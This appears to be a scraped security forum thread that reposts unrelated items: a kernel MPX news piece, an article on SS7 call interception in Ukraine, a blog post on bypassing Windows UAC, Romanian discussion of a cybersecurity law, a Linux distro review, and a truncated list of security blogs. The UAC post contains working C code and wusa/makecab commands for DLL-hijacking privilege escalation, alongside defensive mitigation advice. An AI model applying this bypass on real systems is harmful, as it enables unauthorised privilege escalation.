Nytro

[h=1]Linux 3.19 Kernel Adds Intel MPX Support For Skylake[/h][h=2]Published on 09 December 2014 11:12 AM EST Written by Michael Larabel in Linux Kernel[/h]We've been talking about Intel MPX support in the kernel for one year and with the upcoming Linux 3.19 kernel that support is finally being realized. MPX in this context is short for Memory Protection Extensions. The Intel Memory Protection Extensions is an x86 ISA extension aiming to increase software security by checking pointer references for protecting against buffer overflows or underflows. The kernel side support goes along with compiler changes for enabling MPX. This software security/debug feature is being introduced on the hardware side with next year's Skylake processors. There's over one thousand lines of new code for supporting x86 MPX within the kernel and that code is now slated to land in Linux 3.19. Thomas Gleixner sent in the pull request. "MPX is a new debug feature for bound checking in user space. It requires kernel support to handle the bound tables and decode the bound violating instruction in the trap handler." The Linux 3.19 kernel also brings other initial enablement for Skylake, including initial graphics support. Sursa: [Phoronix] Linux 3.19 Kernel Adds Intel MPX Support For Skylake

Taking up the Gauntlet: SS7 Attacks Cathal McDaid 16th December 2014 There have been several recent reports in the media on the results of new research into SS7 network. This interesting research outlines a series of techniques potential attackers can use to listen in to and read the calls and text messages of others. An obvious question for those of us in the telecom security industry is whether the threat is real and what we should do to address it. In considering an answer, we can look at a little-reported incident that occurred in Ukrainian Mobile networks earlier this year. Last May, a report was issued by the Ukrainian Telecom Regulator (NKRZI[1]). This document, which went essentially unreported by the press outside of Ukraine & Russia, contains the result of the investigation of the NKRZI, assisted by the Ukrainian Security Service (SBU), into telecom network activity over several days in MTS Ukraine. The key findings of this report were that over a 3 day period in April 2014, a number of Ukrainian mobile subscribers were affected by suspicious/custom SS7[2] packets from telecom network elements with Russian addresses, causing their location and potentially the contents of their phone calls to be obtained. The 'attacks' outlined in the document involved SS7 packets being sent between the mobile operators. Without going into specific details, what occurred is a series of SS7 packets were received by MTS Ukraine's SS7 network which modified control information stored in network switches for a number of MTS Ukraine mobile users. In doing so, when someone tried to ring one of the affected mobile subscribers, their call would be forwarded to a physical land line number in St. Petersburg, Russia, without their knowledge - in effect the call has been intercepted. There is an additional further step that could be taken for the interception, not outlined in the original Ukrainian report, but suggested by the Washington Post article. The forwarded-to number could have initiated a new call to the original targeted subscriber, and then conference in the intercepted call, thus allowing itself to listen in to the call without the participants being aware. In the document, the investigation stated that the custom SS7 packets themselves came from links allocated to MTS Russia, the parent company of MTS Ukraine. The Ukrainian regulator then assigned responsibility for the nodes that generated the SS7 based on the origination addresses in the SS7 packets received. According to the report, some of the SS7 source addresses that originated the attack were assigned to MTS Russia, while others were assigned to Rostov Cellular Communications. It's important to keep in mind that this is the report from one side only, and it is stated that they “draw conclusions about the potential for the interference with operation of telecom networks on the part of the PSTN area in the Russian Federation” , however in the report the regulator felt that MTS Ukraine was not doing enough to maintain the privacy of subscribers locations and call forwarding routes. For its part, MTS Russia denied that the SS7 address used was under its control, thus leaving the ultimate instigator a mystery. Indeed, in subsequent follow-ups it was reported that MTS Ukraine was not alone of being at risk, as the Ukrainian Telecom Regulator stated at a later date that Astelit and Kyivstar – the other main Ukrainian mobile operators – also experienced ‘external interference’. Whilst we don't have information on the exact subscribers affected, there have been examples of very sensitive phone calls being intercepted by unknown means within the region, when using non government issued cell-phones. It is purely speculation on our part, but the same SS7 techniques outlined in the report could have conceivably been used to help achieve these interceptions. Looking forward, an unfortunate, but seemingly inevitable, side-effect of these techniques is that it will lead to countries that have been affected adversely by SS7 attacks to attempt to build their own capability, thus leading to an ‘SS7 arms-race’. This has already been experienced in Ukraine, where new legislation has been submitted that one media source stated will allow their security services to legally listen in turn to subscribers of foreign mobile operators, track their location and obtain ‘other’ information about the activity of subscribers. Taken to extremes between countries, this would lead to a form of ‘mutually assured surveillance’, with mobile operators and mobile phone users on both sides suffering. The Ukrainian report, and the recent research that has been released, shows us that we have moved into uncharted territory. Yes, there is a threat, and it is real - as the above example shows - however it does require considerable technical expertise to do this level of network interference. Not only to run and operate SS7 nodes capable of doing this - but especially to gain access to the SS7 network in the first place. Plus the nature of the risk is very different: consider there are more users of the SS7 network worldwide than there users of the internet, yet the number of attacks on IP networks everyday dwarf what is known to occur over SS7. The SS7 network is working as designed, but 'bad actors' are increasingly trying to exploit it, the real danger is that we assume that nothing can be done to fix the problem and it will just get worse as more 'bad actors' try to get access. As has been said by others, as an industry we need to work together to define recommendations and implement solutions to detect and stop potential attacks, because defences are possible and can make a difference if deployed correctly. This coordination is already well underway, and AdaptiveMobile are helping to contribute to this, but no-one should doubt the amount of work and effort that will be required to completely secure the SS7 network from organisations that would seek to exploit it. However, at the same time it would be a mistake for those using these techniques offensively to assume that their activities & methods have gone unnoticed. We are now entering the more public stage of a struggle in which the gauntlet was thrown down some time ago. Example AdaptiveMobile visualisation of SS7 Activity between several mobile operators over a short time spam - looking for abnormal behaviour. Colours represent a selection of different SS7 packet types. The 'clumps' are groups of similar SS7 node types. While unrelated to the events described in the report, the purpose of such work is to help investigate ways in which to detect malicious or unusual SS7 behaviour in networks. Such methods will be called on increasingly in the future to help detect and block unwanted SS7 activity. References: [1] National Commission for the State Regulation of Communications and Information (??????????? ???????, ?? ???????? ???????? ??????????? ? ????? ??`???? ?? ??????????????) [2] Signalling System 7 (SS7), is a catch-all term for a telecom network technology that is used by hundreds of cellular companies to allow them to operate and communicate with each other; it is the computer protocol used by telecom nodes within cellular networks to provide mobility control, network registration, call and text setup etc. In short it enables mobile devices to communicate and roam globally, and it allows mobile operators to control and bill this activity. All pieces of network hardware that operate in the core network use SS7 to interoperate with the rest of the network. Sursa: AdaptiveMobile - mobile network protection and security solutions

Bypassing Windows User Account Control (UAC) and ways of mitigation Securing machines from abuse and compromise in a corporate environment has always been an ongoing process. Providing admin rights to users has always been abused as users have ended up installing unapproved software, change configurations, etc. Not giving local admin rights and they claim they can’t do their work. If malware happens to compromise the machine with full admin rights then you are most likely looking at reimaging the machine. User Account Control (UAC) gives us the ability to run in standard user rights instead of full administrator rights. So even if your standard user account is in the local admin group damage is limited, i.e. installing services, drivers, writing to secure locations, etc. are denied. To carry out these actions users would need to interact with the desktop such us right click and run as administrator or accept the UAC elevation prompt. UAC was introduced from Windows Vista onwards and contains a number of technologies that include file system and registry virtualization, the Protected Administrator (PA) account, UAC elevation prompts and Windows Integrity levels. UAC works by adjusting the permission level of our user account, so programs actions are carried out as a standard user even if we have local admin rights on the computer. When changes are going to be made that require administrator-level permission UAC notifies us. If we have local admin rights then we can click yes to continue otherwise we would be prompted to enter an administrator password. These would however depend on what policies have been defined in your environment. This blog post shows how easily UAC elevation prompts could be bypassed and what actions could be taken to mitigate this threat. Bypassing UAC Exploiting UAC is a trivial process. There are two stages needed to be taken to achieve bypass to elevate from standard user rights to administrator user rights. These steps have widely been published so it’s nothing new though stage 2 documents some more DLL hijacking vulnerabilities. Writing to a secure location Exploiting DLL hijacking vulnerability In order for our bypass to be successful to start off with we need A medium integrity process A standard user in an administrators group Windows executable must be signed by Microsoft code signing certificate Windows executable must be located in a secure directory Windows executable also must specify the auto Elevate property in their manifest Writing to a secure location There are a couple of ways we can write to a secure location. Using the IFileOperation COM Object Using Windows Update Standalone Installer (wusa.exe) IFileOperation COM Object The IFileOperation COM object has a method that we can use to copy files to our secure location as the operation will auto-elevate and able to do a privilege copy. To exploit we can in inject our malicious DLL in a medium integrity process to carry out the operation. Since the COM object is set to auto-elevate the injected process does not need to be marked for auto-elevation in its manifest. On windows 7 injected processes that have copied successfully are C:\Windows\explorer.exe C:\Windows\System32\wuauclt.exe C:\Windows\System32\taskhost.exe During tests taskhost.exe only happens to work once after boot and wuauclt.exe doesn’t always work which leaves explorer.exe is only the reliable process to use. On Windows 8 injected processes that have copied successfully are C:\Windows\explorer.exe C:\Windows\System32\wuauclt.exe C:\Windows\System32\RuntimeBroker.exe Again explorer.exe is only the reliable process to use I found during my tests and the only one that worked on Windows 8.1 The main part of the code below has been taken from MSDN with just the some minor changes. The SetOperationFlags values used was taken from the UAC bypass code published here. #include <stdio.h> #include <Shobjidl.h> #include <Windows.h> #pragma comment(lib, "Ole32.lib") #pragma comment(lib, "shell32.lib") int WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { FileOperation *pfo; IShellItem *psiFrom = NULL; IShellItem *psiTo = NULL; LPCWSTR pszSrcItem = L"calc.dll"; LPCWSTR pszNewName = L"cryptbase.dll"; LPCWSTR pszDest = L"C:\\windows\\System32\\sysprep"; HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); if (SUCCEEDED(hr)) { hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pfo)); if (SUCCEEDED(hr)) { hr = pfo->SetOperationFlags( FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION | FOF_NOERRORUI ); if (SUCCEEDED(hr)) { hr = SHCreateItemFromParsingName(pszSrcItem, NULL, IID_PPV_ARGS(&psiFrom)); if (SUCCEEDED(hr)) { if (NULL != pszDest) { hr = SHCreateItemFromParsingName(pszDest, NULL, IID_PPV_ARGS(&psiTo)); } if (SUCCEEDED(hr)) { hr = pfo->CopyItem(psiFrom, psiTo, pszNewName, NULL); if (NULL != psiTo) { psiTo->Release(); } } psiFrom->Release(); } if (SUCCEEDED(hr)) { hr = pfo->PerformOperations(); } } pfo->Release(); } CoUninitialize(); } return 0; } [B] Windows Update Standalone Installer Another method to use to copy to our secure location is using Windows Update Standalone Installer (wusa.exe). Wusa.exe when executed runs as a high integrity process as its set to auto-elevate in its manifest. For auto-elevation the Windows executable must be signed, located in a secure directory such as C:\Windows\System32 and must specify the autoElevate property in their manifest. We use wusa.exe to extract a CAB file (cabinet archive file) to our secure location wusa c:\users\user1\desktop\poc.tmp /extract:c:\windows\system32\sysprep Here in the example our cab file is called poc.tmp but we can call it whatever we like. Windows comes with the makecab.exe tool so we can even create our cab file makecab c:\users\user1\desktop\CRYPTBASE.dll c:\users\user1\desktop\poc.tmp Exploiting DLL hijacking vulnerability When exploiting a DLL hijacking vulnerability the executable we are going to run again has to be signed; located in a secure directory and must specify the autoElevate property in its manifest in order load as a high integrity process. On Windows 7 there are three executables that could be exploited and associated DLLs listed below C:\windows\ehome\Mcx2Prov.exe C:\Windows\ehome\CRYPTBASE.dll C:\windows\System32\sysprep\sysprep.exe C:\Windows\System32\sysprep\CRYPTSP.dll C:\windows\System32\sysprep\CRYPTBASE.dll C:\Windows\System32\sysprep\RpcRtRemote.dll C:\Windows\System32\sysprep\UxTheme.dll C:\windows\System32\cliconfg.exe C:\Windows\System32\NTWDBLIB.DLL On malwr.com a malware submitted on 25th June last year had already been using Mcx2Prov.exe to bypass UAC and day later an exploit had also been published. The same hash had also been flagged on VirusTotal (38/54) submitted over four months ago. On Windows 8 there are also three executables that could be exploited and associated DLLs listed below C:\windows\System32\sysprep\sysprep.exe C:\windows\System32\sysprep\CRYPTBASE.dll C:\Windows\System32\Sysprep\dwmapi.dll C:\Windows\System32\Sysprep\SHCORE.dll C:\windows\System32\cliconfg.exe C:\Windows\System32\NTWDBLIB.DLL C:\windows\System32\pwcreator.exe C:\Windows\System32\vds.exe C:\Windows\System32\UReFS.DLL Finally on Windows 8.1 there are also three executables that could be exploited and associated DLLs listed below C:\windows\System32\sysprep\sysprep.exe C:\Windows\System32\Sysprep\SHCORE.dll C:\Windows\System32\Sysprep\OLEACC.DLL C:\windows\System32\cliconfg.exe C:\Windows\System32\NTWDBLIB.DLL C:\windows\System32\pwcreator.exe C:\Windows\System32\vds.exe C:\Program Files\Common Files\microsoft shared\ink\CRYPTBASE.dll C:\Program Files\Common Files\microsoft shared\ink\CRYPTSP.dll C:\Program Files\Common Files\microsoft shared\ink\dwmapi.dll C:\Program Files\Common Files\microsoft shared\ink\USERENV.dll C:\Program Files\Common Files\microsoft shared\ink\OLEACC.dll Calling pwcreator.exe (Create a Windows To Go workspace) executable calls vds.exe (Virtual Disk Service) which then loads our DLL and gives us System integrity running in SYSTEM account. Calling these executables sysprep.exe, cliconfg.exe and pwcreater.exe does produce a GUI window but should be able to easily make it run in the background and then terminated after being exploited. This is something I haven’t looked into so I’ll leave upto you. Mitigation The best way to mitigate this bypass is just by not giving users local admin rights to their machines. Majority of user accounts in a corporate environment you should be able to do this reducing the attack surface. This however does not apply home users which would have local admin rights by default. The actual bypass only works when set to the middle two UAC settings which will let it auto-elevate. To see your settings you need to go to Control Panel – User Accounts – Change User Account Control settings. Notify me only when apps try to make changes to my computer (default) Notify me only when apps try to make changes to my computer (do not dim desktop settings) so we could set to Always notify but this would bring it back to like it was on Windows Vista with constant notifications and not really practical and the user would end up setting it to Never notify which is definitely not a good idea. Microsoft has given us 10 UAC policies to play with so it’s worth spending some time understanding and testing these out before implementing it in your own domain environment. To see what is applied on your local machine type secpol.msc into Start-Run to open the Local Security Policy snap-in and expand the Local Policies-Security Options folder. Run rsop.msc to view group policies applied on machines in a domain environment. Looking in the registry these are the default values of UAC [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "ConsentPromptBehaviorAdmin"=dword:00000005 "ConsentPromptBehaviorUser"=dword:00000003 "EnableInstallerDetection"=dword:00000001 "EnableLUA"=dword:00000001 "EnableSecureUIAPaths"=dword:00000001 "EnableUIADesktopToggle"=dword:00000000 "EnableVirtualization"=dword:00000001 "FilterAdministratorToken"=dword:00000000 "PromptOnSecureDesktop"=dword:00000001 "ValidateAdminCodeSignatures"=dword:00000000 When the slider is moved upto “Always notify me” it changes this value "ConsentPromptBehaviorAdmin"=dword:00000002 When the slider is moved down to “Notify me only when apps try to make changes to my computer (do not dim desktop settings)” it changes this value "PromptOnSecureDesktop"=dword:00000000 And when the slider is moved to “Never notify” the values changed are "ConsentPromptBehaviorAdmin"=dword:00000000 "EnableLUA"=dword:00000000 "PromptOnSecureDesktop"=dword:00000000 Take note that EnableLUA has been disabled completely. This is an extremely dangerous value to be in and should never be disabled so its strongly recommend to set this settings to be enabled in group policies so it always gets applied if settings are reset/changed by users or by previously removed malware. User Account Control: Run all administrators in Admin Approval Mode Once disabled not only a malicious process could be able to go straight to high integrity without any bypass but also Internet Explorer would run in medium integrity. UAC gives us the Protected Mode (sandbox) in Internet Explorer providing added security. Internet Explorer normally runs in low integrity child process so if compromised by some IE exploit the damage is minimized as in low integrity there are only a handful of locations it can be written to on the system. These changes mentioned above have been seen on Windows 7. On Windows 8/8.1 EnableLUA does not change to disabled. So when the slider is moved to Never notify the values changed are only "ConsentPromptBehaviorAdmin"=dword:00000000 "PromptOnSecureDesktop"=dword:00000000 Since value “EnableLUA”=dword:00000001 does not change, UAC is not completely disabled and Internet Explorer would still run in low integrity. If however a user logged onto a machine using the local admin account (administrator or whatever renamed on your corporate build) UAC settings does not apply as all processes run in high integrity. This applies to Windows 7/8 and 8.1 so always make sure users DO NOT logon using local admin account, if local admin rights are required better add their domain account to the local administrators group. If for whatever reason logging on using the local admin account is a necessity then best set this UAC policy to enabled. User Account Control: Admin Approval Mode for the built-in Administrator account “FilterAdministratorToken”=dword:00000001 Another option would be to look into renaming or deleting the executables Mcx2Prov.exe, sysprep.exe, cliconfg.exe and pwcreator.exe if definitely not required on the system so the second stage to exploit DLL hijacking fails. Finally if users do require local admin privileges then worth setting their machine UAC policy to Always notify and they live with the constant notifications. User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode (2-Prompt for consent on the secure desktop) Conclusion This bypass only works when all of the requirements are available to abuse. Remove one requirement and the bypass will fail. Office documents are opened in medium integrity so these are ideal targets to abuse the UAC bypass. Since these bypasses are so effortlessly achieved the only real course of action would be to set UAC to “Always notify” or remove local admin rights for the user. In the end using agents like Microsoft EMET or MalwareBytes Anti-Exploit would be the best mitigating action to take from initially being exploited in the first place. Here are the source and binaries you can test for yourself. I tested it on Windows Enterprise 7/8/8.1 64bit References User Account Control: Inside Windows 7 User Account Control Security: Inside Windows Vista User Account Control What is User Account Control? - Windows Help What are User Account Control settings? - Windows Help User Account Control – What Penetration Testers Should Know | Strategic Cyber LLC Sursa: Bypassing Windows User Account Control (UAC) and ways of mitigation | GreyHatHacker.NET

x86?

Nu pare sa mearga

It worked for me. Note: Please use a virtual machine. It may be infected.

Nu stiu sigur, dar e posibil sa mai fie de actualitate. Nu stiu prea multe despre acest post, dar daca imi trimiteti CV-urile pe PM, ajung la cine trebuie.

Mie imi apar acum dar daca mai aveti probleme cu anumite imagini, postati aici.

Traian Basescu despre legea securitatii cibernetice: Trebuie sa existe control judecatoresc pe accesul structurilor de securitate in bazele de date ale operatorilor. / Masura poate preveni atacuri teroriste si cibernetice. Trebuie avut grija sa nu se

Legea Securit??ii cibernetice nu se adreseaz? persoanelor fizice | adevarul.ro

Proteste: Legea securit??ii cibernetice scoate românii în strad?. Mai multe proteste au fost anun?ate duminic? în ?ar? | adevarul.ro Cine ne da si noua un link catre articolele complete de lege? Multumim.

[h=1]Mo? Cr?ciun ne aduce calul troian: securismul cibernetic[/h] Author: bogdan 19/12/2014 0 Comments Opinie acces la date, audit informatic, lege, securitate cibernetic?, secursim cibernetic, Senat Dupa ce 3 luni de zile Senatul a dormit in p?pu?oi la a?a-numita lege a securit??ii cibernetice,s-a activat cu pu?in timp inainte de Cr?ciun. Dupa 9 decembrie, într-o ?edin?a în care au fost invita?i doar SRI, MAI ?i MSI, Comisia de securitate na?ional? a confirmat (cu modificari neesen?iale) proiectul de lege al SRI cu privire la securismul cibernetic. (de?i am trimis în repetate rânduri criticile textului actual, nici m?car nu le-au publicat pe site, dar?mite s? se la ia în considerare.) Dup? care ast?zi, pe 19 decembrie proiectul a trecut rapid prin Senat ?i votat cu unanimitate (sunt curios daca oamenii aia stiu pentru ce ridic? mâna). Legea este practic adoptat? de c?tre Parlament, dar înc? nu este în vigoare. Teoretic, parlamentarii Opozi?iei o pot contesta la Curtea Constitu?ional?. Dac? nu va trimis? la CCR, legea va fi trimis? spre promulgare la Cotroceni, acolo unde pre?edintele Klaus Johannis are trei variante: o poate promulga, o poate întoarce în Parlament spre reexaminare sau o poate trimite ?i el la Curtea Constitu?ional?. Din punctul nostru de vedere va fi Primul Test adev?rat al lui Johannis, care poate decide dac? vrea s? creem un stat poli?ienesc sau unul cet??enesc. Pe fond, am scris de mai multe ori despre problemele majore ale legii (c? de cele minore nu mai are rost s? mai zicem ceva): Art 17 -To?i de?in?torii de sisteme cibernetice (adic? toate persoanele juridice care au un calculator – vezi art. 2) trebuie sa “permita accesul la date” acestor autoritati (SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO si ANCOM). Accesul se face la simpla “solicitare motivata”. În condi?iile în care ast?zi orice acces la sistemele informatice unde se afl? date informatice se face doar cu autorizarea unui judecator, textul actual ne arunc? în haos. De fapt ?i accesul la date de trafic este de fapt imposibil ast?zi, dac? este s? respect?m decizia CCR privire la directiva privind p?strarea datelor de trafic. Din punctul nostru de vedere art. 17 este v?dit neconstitu?ional. Art 16 – To?i de?in?torii de sisteme cibernetice (adic? toate persoanele juridice care au un calculator) vor obliga?i s? aplice politici de securitate cibernetic? ?i s? identifice ?i s? implementeze m?surile tehnice ?i organizatorice adecvate pentru a gestiona eficient riscurile de securitate. Asta inseamn? minim 1500 de euro/firma investi?i in securitate. Dac? nu – amend? de la 500 la 5000 de RON Art 10 – In vreme ce UE discut? ca aceste institu?ii care se ocupa de domeniul securit??ii cibernetice s? fie “organisme civile, care s? func?ioneze integral pe baza controlului democratic, ?i nu ar trebui s? desf??oare activit??i în domeniul informa?iilor”, noi dam SRI-ul ca cea mai democratica, civila si apropriata de cetateni dintre institutii. Competenta tehnica o avea, dar sub control democratic nu este. Si nici nu cunoaste termeni precum dezbatere publica, acces la informatii publice sau transparenta decizionala. Poate doar 2015 s? ne mai lumineze! Sursa: APTI Link: Mo? Cr?ciun ne aduce calul troian: securismul cibernetic | Date personale si viata privata

Articol mai bune: Legea securit??ii cibernetice a fost adoptat? *în unanimitate. Serviciile secrete au acces la informa?ii de internet ?i telefonie | adevarul.ro (muie Antena 3)

Norocul nostru ca sunt prosti din punct de vedere tehnic.

Ubuntu GNOME 15.04 Alpha 1 A special edition of Ubuntu Linux, built around the GNOME graphical desktop environment Welcome to the Vivid Vervet edition of Ubuntu GNOME, an open source and free desktop-oriented operating system that uses the controversial GNOME desktop environment on top of a stable and reliable Ubuntu base. Distributed as 64-bit and 32-bit Live DVDs The Ubuntu GNOME distribution is available for download as two Live DVD ISO images, one for each of the supported hardware platforms (32-bit and 64-bit). Both ISOs have approximately 1 GB in size and can be written on either DVD discs or USB thumb drivers of 1GB or higher capacity. Offers standard boot options The boot menu is hidden by default, as the distribution will start automatically in ten seconds from the moment the user inserts and boots the bootable medium (CD or USB) from the BIOS of his/her computer. Default boot options include the ability to try Ubuntu GNOME without installing it, start the installation directly, check the disc for defects, run a memory diagnostic test, as well as to boot an existing OS from the local drive. Uses the GNOME desktop environment As expected, the distribution uses GNOME as its default and only graphical desktop environment. Its main goal is to provide Ubuntu fans who love the GNOME desktop with a distribution of Linux tailored for their needs. Comes pre-loaded with a wide range of open-source apps A wide range of open-source applications are included in the Ubuntu GNOME Linux distribution. Among the most popular ones, we can mention the Mozilla Firefox web browser, Evolution ema9l and calendar client, Rhythmbox music player, Totem video player and Cheese webcam viewer. In addition, the Nautilus file manager, Empathy instant messenger, Evince document viewer, Shotwell image viewer and organizer, GIMP image editor, Transmission torrent downloader, numerous GNOME apps and tools, as well as the entire LibreOffice office suite are also included. Reviewed by Marius Nestor, last updated on December 18th, 2014 Sursa: Download Ubuntu GNOME 15.04 Alpha 1 for Linux - Softpedia

[h=1]Top 100+ Cyber Security Blogs & Infosec Resources[/h] [h=2]PR8[/h] [h=3]#1 CIO[/h] Resources related to information security, including news and opinion and more on software and application flaws and fixes, data breaches, the inside threat the latest hacker attacks. [h=3]#2 TechRepublic – Security[/h] TechRepublic helps IT decision-makers identify technologies and strategies to empower workers and streamline business processes. Their security section dives into the latest threats surrounding cyber security. [h=3]#3 US Cert[/h] US-CERT’s mission is to improve the nation’s cybersecurity posture, coordinate cyber information sharing, and proactively manage cyber risks. [h=3]#4 Wired’s Threat Level[/h] Privacy, crime, and online security are the topics that carry the headlines here. You’ll find everything from opinionated pieces, to the latest threat alerts. [h=3]#5 Zero Day from ZDNet[/h] Staying on top of the latest in software/hardware security research, vulnerabilities, threats and computer attacks. The Zero Day blog on ZDNet is a must for anyone keeping track of the industry. [h=2]PR7[/h] [h=3]#6 CERIAS Security Blog[/h] The Center for Education and Research in Information Assurance and Security blog is where Gene Spafford shares his expertise. It’s called the center for multidisciplinary research for a reason. [h=3]#7 CSO Online[/h] Areas of focus include information security, physical security, business continuity, identity and access management, loss prevention and more. [h=3]#8 Dark Reading[/h] Dark Reading is a comprehensive news and information portal that focuses on IT security, helping information security professionals manage the balance between data protection and user access. [h=3]#9 Google Online Security Blog[/h] This is Google’s own security blog, which focuses on all of the latest developments in the security world. Get the latest news and insights from Google on security and safety on the Internet. [h=3]#10 Red Tape Chronicles[/h] NBC News Red Tape Chronicles brings you news stories and information on the latest developments in the cyber security space. Find topics that range from privacy to security. [h=3]#11 InformationWeek Security[/h] You can expect all of the latest news and zero day alerts from this IT security news site. The content is updated daily and is a major news source for everything to do with cyber security. [h=3]#12 Internet Storm Center[/h] The Internet Storm Center gathers millions of intrusion detection log entries every day, from sensors covering over 500,000 IP addresses in over 50 countries. [h=3]#13 Schneier On Security[/h] Bruce Schneier is an internationally renowned security technologist, and called a “security guru” by The Economist. He knows his stuff and is a voice in the cyber security industry. [h=3]#14 Securelist Cyber Security Blog[/h] This is another Kaspersky Lab web property that focuses on malware, phishing, and the cyber security industry. There is no shortage of information and news on what’s happening in the cyber world. [h=3]#15 Symantec Weblog[/h] The Symantec Weblog uses global research to provide unparalleled analysis of and protection from malware, security risks, vulnerabilities, and spam. [h=3]#16 The Guardian’s Information Security Hub[/h] The Guardian is a respectful, global media company that highlights issues across many areas. Their Information Security Hub lives up to the coverage they offer in other areas and focuses on security. [h=3]#17 Zone Alarm Cyber Security Blog[/h] Information on malware and protecting yourself online. From malware alerts to practical online security tips, the Zone Alarm blog will keep you briefed on the latest industry news. [h=2]PR6[/h] [h=3]#18 BH Consulting’s Security Watch Blog[/h] BH Consulting’s Security Watch Blog was formed to regular, informed with content detailing everything you would want to know about information security and web threats. [h=3]#19 Contagio Malware Dump[/h] Contagio is a collection of the latest malware samples, threats, observations, and analyses. Get informed, technical education on the newest forms of malware. [h=3]#20 Cyber Crime & Doing Time[/h] CyberCrime & Doing Time ia a blog about cyber crime and justice related issues. Gary Warner from Malcovery owns this blog and offers up educational and engaging posts on the latest threats. [h=3]#21 David Lacey’s IT Security Blog[/h] David Lacey’s IT Security Blog offers the latest ideas, best practices, and business issues associated with managing security. The blog is hosted on ComputerWeekly.com. [h=3]#22 Dell SecureWorks[/h] Dell Securework’s Security & Compliance blog is dedicated to providing up-to-date news and information to help IT professionals and others keep their business secure online. [h=3]#23 F-Secure Safe & Savvy Blog[/h] Safe and Savvy blogs about how to protect your online life and the irreplaceable content on your computer. They write about real-life experiences while providing helpful tips on security issues. [h=3]#24 Fox IT Security Blog[/h] Information technology is the main topic on the Fox IT security blog. From news to opinions, Fox IT provides excellent content for anyone interested in technology and security. [h=3]#25 Fortinet Blog[/h] The Fortinet cyber security blog has something for everyone. There are articles on security research and industry trends, as well as, a healthy section focusing entirely on Security 101. [h=3]#26 Help Net Security[/h] Help Net Security has been a prime resource for information security news since 1998. The site always hosts fresh content including articles, new product releases, latest industry news, podcasts and more. [h=3]#28 Infosecurity Magazine[/h] What more can you ask for? It’s an online magazine dedicated entirely to the strategy, insight, and techniques that are a daily part of the cyber security industry. [h=3]#29 Krebs On Security[/h] Brian Krebs is the face of cyber security journalism. As a former writer for the Washington Post, Krebs is able to take is skills as an investigative journalist to the task and provide the most in-depth coverage of security. [h=3]#30 Malwarebytes[/h] Malwarebytes is at the forefront of malware protection, which makes this the perfect blog to stay up-to-date with the latest zero day threats and cyber security news. [h=3]#31 McAfee Security Blog[/h] The McAfee security blog talks about research and threat analysis, as well as, provides knowledgeable insight into malware and zero day threats that plague businesses and consumers. [h=3]#32 Microsoft Malware Protection Center[/h] The Microsoft Malware Protection Center (MMPC) is committed to helping Microsoft customers keep their computers secure. The MMPC stays agile to combat evolving threats. [h=3]#32 Naked Security[/h] Naked Security is Sophos’s award-winning threat news room, giving you news, opinion, advice and research on computer security issues and the latest internet threats. [h=3]#33 Network Computing[/h] Network Computing’s content adheres to the valuable “For IT, By IT” methodology, delivering timely strategy & tactics, news, in-depth features, expert reviews, and opinionated blogs. [h=3]#34 SANS Institute AppSec Blog[/h] SANS Software Security focuses the deep resources of SANS on the growing threats to the application layer by providing training, certification, research, and community initiatives. [h=3]#35 SC Magazine[/h] SC Magazine arms information security professionals with the in-depth, unbiased business and technical information they need to tackle the countless security challenges they face. [h=3]#36 Search Security[/h] Search Security provides immediate access to breaking industry news, virus alerts, new hacker threats and attacks, security and certification training resources. [h=3]#37 Securing The Human[/h] SANS is the most trusted and by far the largest source for information security training and security certification in the world, which makes their blog a must read for security professionals. [h=3]#38 Security Watch[/h] Neil Rubenking heads the charge on PC Mag’s Security Watch. His style is witty and he post frequently, so you’ll always find something worthwhile to read. [h=3]#39 Stop Badware Blog[/h] StopBadware is a nonprofit anti-malware organization whose work makes the Web safer through the prevention, mitigation, and remediation of badware websites. [h=3]#40 Sucuri Blog[/h] Sucuri knows all about malware and WordPress security. It’s what they do. You’ll find no shortage of expert advise on how to secure your WordPress site and keep it malware-free. [h=3]#41 TaoSecurity[/h] Richard Bejtlich’s blog on digital security, concentrating on global challenges posed by China and other targeted adversaries. Definitely a blog that has been a fixture in the security community. [h=3]#42 Techworld Security[/h] The cyber security section on Techworld.com covers news on the latest threats and zero-day exploits. They also offer an abundance of topics ranging from security to how-tos, as well as, technology reviews. [h=3]#43 The Honeynet Project[/h] The Honeynet Project members engage the broader security community and educate the public about threats to systems and information. [h=3]#44 Threatpost[/h] Threatpost, The Kaspersky Lab security news service, is an independent news site which is a leading source of information about IT and business security for hundreds of thousands of professionals worldwide. [h=3]#45 Threat Track Security[/h] Threat Track Security’s IT blog has its thumb on the pulse of the industry. Whether you are in the IT industry or not, if you are interested in security, this blog is for you. [h=3]#46 Trend Micro Simply Security[/h] Trend Micro Simply Security offers independent news and views as well as expert insight from Trend’s security experts. The site covers topics ranging from cloud security, data protection, security and privacy. [h=3]#47 Veracode Blog[/h] Veracode Security Blog: Application security research, security trends and opinions. Everything you want to know about if you work in infosec or online. [h=3]#48 Unmask Parasites Blog[/h] Unmask Parasites focuses on reviewing the latest security threats, zero days, and exploits. There is everything from security-related news, to information on keeping your site secure and malware-free. [h=3]#49 We Live Security[/h] We Live Security is a site about research and information, not products. We Live Security’s writers represent the cream of ESET’s researchers and writers. They deliver in-depth research and analysis on security. [h=3]#50 Xylibox Security Blog[/h] Tracking and demystifying cybercrime is what happens here. The author never fails to produce consistent, detailed breakdowns of the latest malware and security tools. [h=2]PR5[/h] [h=3]#51 BankInfoSecurity[/h] BankInfoSecurity is a multi-media website published by Information Security Media Group, Corp. (ISMG), a company specializing in coverage of information security, risk management, privacy and fraud. [h=3]#52 Cyveillance Blog[/h] From sophisticated DDoS botnet attacks to phishing, the Cyveillance blog will keep you up-to-date with breaking cyber security news and information on everything related to web threats, malware and security. [h=3]#53 Forbe’s Firewall[/h] Forbe’s Firewall covers cyber security news and information on the latest exploits and trends affecting the industry. The articles are on point and informative, with the quality you can expect from Forbes. [h=3]#54 GovInfoSecurity[/h] GovInfoSecurity is a multi-media website published by Information Security Media Group, Corp. (ISMG), a company specializing in coverage of information security, risk management, privacy and 